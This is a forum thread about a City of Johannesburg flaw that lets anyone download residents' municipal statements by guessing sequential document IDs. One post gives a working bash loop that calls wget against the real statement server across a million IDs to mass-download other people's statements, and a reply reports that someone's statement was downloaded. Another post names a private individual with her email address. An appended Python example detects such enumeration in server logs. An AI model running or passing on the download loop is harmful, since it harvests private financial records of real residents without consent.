City of Joburg security flaw exposes private info

BrokenLink (Senior Member; joined Aug 7, 2008; 963 messages)
Did they also pay R143m and use those little kids that made the Free State government's WordPress website?
 

DJ... (Banned; joined Jan 24, 2007; 70,288 messages)
How can one change details with the information? The login doesn't use the account number and pin as far as I can tell...
 

MagicDude4Eva (Banned; joined Apr 2, 2008; 6,479 messages)
Worst part still to come: A ton of security companies will now fill out tender forms and taxpayers will pay millions to fix a simple software development/architecture (a major rookie mistake - whoever the IT service provider is, should really look at their review & QA process). Makes one wonder how many more leaks like this exist and how much of this information is currently misused.

Quite scary how lenient CoJ is with collections (but then again, who knows if those invoices are correct to begin with).
 

phaktza (Executive Member; joined Jun 29, 2008; 7,443 messages)
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <chrissenda@in-quest.co.za>; a quick search reveals http://www.in-quest.co.za/ to be a "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!
 

Necropolis (Executive Member; joined Feb 26, 2007; 8,401 messages)
phaktza said:
> I warned everyone months ago that the passwords are stored as plaintext.
>
> Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.
>
> The individual in question is Chrissenda Jacobs <chrissenda@in-quest.co.za>; a quick search reveals http://www.in-quest.co.za/ to be a "Commercial Debt Collection and Consumer Debt Collection" agency.
>
> So even if this were the case, CoJ is happy to share your information with just about anyone!

That In-Quest site has been hacked as well:

This Site has been hacked by 0NullSec!

No Damage has been done to the site!

Admin please Secure your site!
 

bullzeye.za (Expert Member; joined Sep 16, 2008; 1,713 messages)
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.
 
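Added example, not part of any post in this thread: the loop above only has to count upward because the statement IDs are sequential, so one defensive check is to look for clients walking consecutive documentID values in the web server's access log. The log lines, client IPs, timestamps and the `min_run` threshold are constructed for illustration, and the common log format is an assumption about the server.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample (common log format assumed); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0200] "GET /cojpdfweb/getPDF?documentID=112001000000&download=true HTTP/1.1" 200 48211
198.51.100.7 - - [01/Jan/2024:10:00:01 +0200] "GET /cojpdfweb/getPDF?documentID=112001000001&download=true HTTP/1.1" 404 312
198.51.100.7 - - [01/Jan/2024:10:00:02 +0200] "GET /cojpdfweb/getPDF?documentID=112001000002&download=true HTTP/1.1" 200 51990
192.0.2.10 - - [01/Jan/2024:10:00:02 +0200] "GET /cojpdfweb/getPDF?documentID=112001457812&download=true HTTP/1.1" 200 47102
198.51.100.7 - - [01/Jan/2024:10:00:03 +0200] "GET /cojpdfweb/getPDF?documentID=112001000003&download=true HTTP/1.1" 200 50077
192.0.2.10 - - [01/Jan/2024:10:05:40 +0200] "GET /cojpdfweb/getPDF?documentID=112001093341&download=true HTTP/1.1" 200 46850
203.0.113.5 - - [01/Jan/2024:10:06:00 +0200] "GET /favicon.ico HTTP/1.1" 404 209
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*" \d{3} ')

def document_requests(log_text):
    """Yield (client, document_id) for every getPDF request, whatever its status."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, url = m.group(1), urlsplit(m.group(2))
        ids = parse_qs(url.query).get("documentID", [])
        if url.path.endswith("/getPDF") and ids and ids[0].isdigit():
            yield client, int(ids[0])

def longest_run(ids):
    """Length of the longest run of consecutive integers among ids."""
    best = run = 0
    prev = None
    for n in sorted(set(ids)):
        run = run + 1 if prev is not None and n == prev + 1 else 1
        best, prev = max(best, run), n
    return best

def flag_enumeration(log_text, min_run=4):
    """Return {client: longest_run} for clients walking consecutive documentIDs."""
    seen = defaultdict(list)
    for client, doc_id in document_requests(log_text):
        seen[client].append(doc_id)
    runs = {client: longest_run(ids) for client, ids in seen.items()}
    return {client: run for client, run in runs.items() if run >= min_run}

if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG))
```

Detection like this only spots the symptom; the fix is for getPDF to serve a documentID only to an authenticated session that owns that account.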

siraman (Expert Member; joined Jan 13, 2009; 1,982 messages)
Holy s**t!!! I've just downloaded someone's statement, nooooooo this is so wrong, heads must roll.
 

Bern (Expert Member; joined Apr 29, 2010; 2,675 messages)
bullzeye.za said:
> Just for fun, here's a little bash script if you want to download a bunch of those:
> for i in `seq -w 0 999999`
> do
> wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
> done
>
> Let's see who can get the most :p
>
> But seriously, don't use this. Do not.

I would never even consider it...
 